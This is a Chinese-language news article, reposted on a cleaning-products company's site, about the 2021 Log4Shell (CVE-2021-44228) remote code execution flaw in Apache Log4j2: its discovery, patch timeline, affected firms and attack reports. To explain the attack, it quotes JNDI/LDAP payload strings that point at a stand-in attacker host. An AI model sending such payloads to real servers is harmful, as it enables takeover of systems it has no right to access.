提供质量好,价格优惠的洗洁精,洗衣液,洗手液,漂白水,洁厕精,玻璃水等清洁用品,强力去污,深度清洁,让您轻松乐享生活!

广东亮源生物科技有限公司

网站首页 > 新闻资讯 > 业界资讯

中国程序员抢先预警「史诗」级漏洞,席卷苹果特斯拉

2021-12-14 08:08:50 广东亮源生物科技有限公司 已读

2021年11月24日,阿里云安全团队依然像往常一样进行着漏洞的筛查工作。


让人没想到的是,团队成员之一的Chen Zhaojun一铲子下去,就挖出了一个「过去十年来影响最大、最严重的漏洞」——Log4Shell。



借着这个漏洞,攻击者只需要提交一个字符串就能访问对方的服务器,甚至还能在里面上传运行任何代码!


结果就是,12月10号,本来已经在准备过周末的大厂程序员们,都起来通宵加班处理漏洞了。



这个漏洞波及了多少大厂呢?


由于Log4j2这个库实在是太受欢迎了,所以包括苹果、Tesla、亚马逊、Cloudflare、ElasticSearch、Red Hat、Twitter、Steam、百度、网易、腾讯等大厂都会受到影响。



可能,还有数百家甚至数千家其他组织也会受到影响。


一些信息安全研究人员预计,未来几天互联网上对服务器的攻击会大幅增加。


惊魂一刻


11月24,开源项目Apache Log4j2的一个远程代码执行漏洞被提交。


12月7日上午,Apache发布了2.15.0-rc1版本更新。


12月9日晚,漏洞的利用细节被公开,影响范围几乎横跨整个版本(从2.0到2.14.1-rc1)。


当大家纷纷升级到2.15.0-rc1之后发现,该补丁依然可以被绕过。


12月10日凌晨2点半左右,Apache Log4j2紧急更新了2.15.0-rc2版本。


此时,各个大厂也几乎都在熬夜抢修。



据火绒不完全统计,仅在Github上,就有60644个开源项目发布的321094软件包存在风险,这一漏洞可以说是影响了互联网上70%以上企业系统的正常运转。



Java开发框架中,受到Log4j2的影响Top10(来源:火绒安全)


这一漏洞名为CVE-2021-44228,也叫Log4Shell或LogJam,是一个远程代码执行(RCE)类漏洞,存在于一个「数百万」应用程序都在使用的开源Java日志库Log4j2中。


由于Java应用程序通常会记录各种各样的事件,例如用户发送和接收的消息,或者系统错误的详细信息,因此该漏洞可以通过多种方式触发。



而这一漏洞最危险的地方是它太容易被攻击者利用了,即使是毫无经验的普通人也可以利用这个漏洞成功执行攻击。


攻击者只需发送一则特殊的消息到服务器(包含类似${jndi:ldap://server.com/a}的字符串),就可以执行任意的代码,并有可能完全控制该系统。



据阿里的@程序员子悠介绍,服务器会通过Log4j2记录攻击者发送的请求汇中包含的基于JNDI和LDAP的恶意负载${jndi:ldap://http://attacker.com/},其中,http://attacker.com是攻击者控制的地址。


当服务器通过JNDI向http://server.com请求,触发恶意负载之后,http://attacker.com就可以在响应中添加任何可执行脚本,注入到服务器进程中。



于是,上个周末,大大小小公司的安全团队都在争先恐后地修补Log4Shell漏洞,晚一秒,就有可能让黑客危及互联网上数百万台设备。


而黑客们也没闲着,安全服务商imperva当天就监控到了140多万次针对CVE-2021-44228的攻击。



新西兰计算机应急响应小组(CERT)、德国电信(Deutsche Telekom)和Greynoise的网络监控服务都发出了警告:「攻击者已经在积极利用这个漏洞」。


根据Greynoise的说法,大约100个不同的主机正在大规模地寻找利用Log4j2漏洞的方法。


很快,多家信息安全新闻机构都报道了这个在Apache Log4j2库中发现的,CVSS严重程度为10级的关键漏洞CVE-2021-44228。


阿里云安全团队在12月10日发布公告。



https://help.aliyun.com/noticelist/articleid/1060971232.html


国家互联网应急中心12月10日发布公告。



https://www.cert.org.cn/publish/main/9/2021/20211210110550958546708/20211210110550958546708_.html


美国国家计算机通用漏洞数据库12月10日发布公告。



https://nvd.nist.gov/vuln/detail/CVE-2021-44228


Apache基金会也迅速回应,建议所有开发人员能升级就升级,将手头上使用到的Log4j2库更新到2.15.0版本,如果因为一些原因升不了级,就使用Apache Log4j2安全漏洞页面中描述的方法进行扑救。


12月12号,有网友反映银行的程序都不能用了,推测可能正在加班加点排查,看来波及范围确实挺大的。


Powered by MetInfo 5.3.19 ©2008-2022 www.MetInfo.cn